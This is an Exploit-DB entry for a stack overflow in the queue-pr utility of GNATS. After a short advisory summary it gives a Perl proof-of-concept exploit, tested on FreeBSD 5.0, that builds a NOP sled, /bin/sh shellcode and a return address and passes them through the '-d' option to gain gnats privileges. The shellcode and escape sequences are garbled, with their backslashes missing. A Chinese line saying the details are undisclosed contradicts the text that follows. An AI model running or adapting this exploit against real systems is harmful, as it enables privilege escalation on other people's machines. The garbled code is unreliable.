https://www.exploit-db.com/exploits/22939

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/8232/info

A stack overflow vulnerability has been reported for the queue-pr utility of GNATS. The vulnerability occurs due to insufficient checks performed on the arguments to the '-d' commandline option. 

Successful exploitation may result in the execution of attacker-supplied code with potentially elevated privileges.

#!/usr/bin/perl

# Simple PoC exploit for gnats
# Tested on FreeBSD 5.0 with gnats-3.113.1_6
# if all works it gives gnats access

# Code by inv[at]dtors

$ret_hex = 0xbfbffb90;
$shellcode ="x99x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x54x53x52x31xc0xb0x3bxcdx80x31xc0xb0x01xcdx80";
$nops = "x90"x1110;
$ret = pack('l', $ret_hex);

$exploit = "$nops"."$shellcode"."$ret"."$ret";
local($ENV{'EXP'}) = $exploit; 

print "ndtors gnats exploitn";
print "code by invnn";
print ("Address: 0x", sprintf('%lx', $ret_hex),"nn");

system('/usr/local/libexec/gnats/queue-pr -d $EXP -O bbb');